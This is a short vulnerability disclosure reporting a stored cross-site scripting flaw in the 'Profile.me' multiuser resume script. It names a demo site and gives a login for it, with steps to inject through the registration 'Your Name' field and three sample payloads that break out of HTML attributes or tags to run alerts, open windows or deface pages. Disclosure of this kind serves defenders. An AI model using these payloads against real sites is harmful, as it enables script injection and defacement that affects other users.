[*] :: Title: Profile.me - Multiuser profile & resume script Stored XSS Injection [*] :: Author: QUIXSS [*] :: Date: 2019-05-05 [*] :: Software: Profile.me - Multiuser profile & resume script [?] :: Technical Details & Description: # Weak security measures like bad input fields data filtering has been discovered in the «Profile.me - Multiuser profile & resume script» web-application. [?] :: Demo Website: # https://codecanyon.net/item/profileme-multiuser-profile-resume-script/23743952 # Frontend: http://profileme.pokkho.com # Backend: http://profileme.pokkho.com/login # Login/Password (user): quixss/asdasd [!] :: Special Note: # After a few injections you'll see that some blocks on the «Users» page are broken due to bad input fields data filtering. # There are various mechanisms to secure application. These mechanisms are: ... & Cross-Site Scripting (XSS) Prevention © author [!] :: For developers: # Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients. [+] :: PoC [Links]: # http://profileme.pokkho.com/login (log in as quixss/asdasd) # http://profileme.pokkho.com/admin/users (marquee) [+] :: PoC [Stored XSS Injection]: # Go to the demo website http://profileme.pokkho.com and register a new account (no validation required). Use the «Your Name» field for payload injection. Probably there is another vulnerable fields, but they are all disabled on the demo website. # Sample payload #1: " autofocus onfocus="alert('QUIXSS');"/> # Sample payload #2: " autofocus onfocus="alert('QUIXSS');window.open('https://twitter.com/quixss');"/><img src="https://i.imgur.com/zRm8R9z.gif"> # Sample payload #3: "></h3></tr></td></table></tr></td></table></div><marquee>QUIXSS